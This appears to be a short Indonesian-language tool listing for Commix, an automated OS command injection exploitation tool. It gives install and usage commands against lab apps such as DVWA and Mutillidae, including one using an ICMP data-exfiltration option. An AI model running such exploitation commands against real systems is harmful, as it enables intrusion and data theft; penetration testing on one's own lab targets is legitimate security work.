Commix - Automated All-in-One OS Command Injection and Exploitation Tool

Commix memiliki lingkungan yang sederhana dan dapat digunakan, dari pengembang web, penguji penetrasi atau bahkan peneliti keamanan untuk menguji aplikasi web dengan pandangan untuk menemukan bug, kesalahan atau kerentanan terkait dengan perintah serangan injeksi. Dengan menggunakan alat ini, sangat mudah untuk menemukan dan mengeksploitasi kerentanan perintah injeksi dalam parameter tertentu yang rentan. Commix ditulis dalam bahasa pemrograman Python.

Requirements

Python versi 2.6.x atau 2.7.x diperlukan untuk menjalankan program ini. 

 

Installation

git clone https://github.com/stasinopoulos/commix.git commix

Usage Example

Exploiting Damn Vulnerable Web App

python commix.py --url="http://192.168.178.58/DVWA-1.0.8/vulnerabilities/exec/#" --data="ip=INJECT_HERE&submit=submit" --cookie="security=medium; PHPSESSID=nq30op434117mo7o2oe5bl7is4"

Exploiting php-Charts 1.0 using injection payload suffix & prefix string:

python commix.py --url="http://192.168.178.55/php-charts_v1.0/wizard/index.php?type=INJECT_HERE" --prefix="//" --suffix="'" 

Exploiting OWASP Mutillidae using Extra headers and HTTP proxy:

python commix.py --url="http://192.168.178.46/mutillidae/index.php?popUpNotificationCode=SL5&page=dns-lookup.php" --data="target_host=INJECT_HERE" --headers="Accept-Language:fr\nETag:123\n" --proxy="127.0.0.1:8081"

Exploiting Persistence using ICMP exfiltration technique :

su -c "python commix.py --url="http://192.168.178.8/debug.php" --data="addr=127.0.0.1" --icmp-exfil="ip_src=192.168.178.5,ip_dst=192.168.178.8""

Download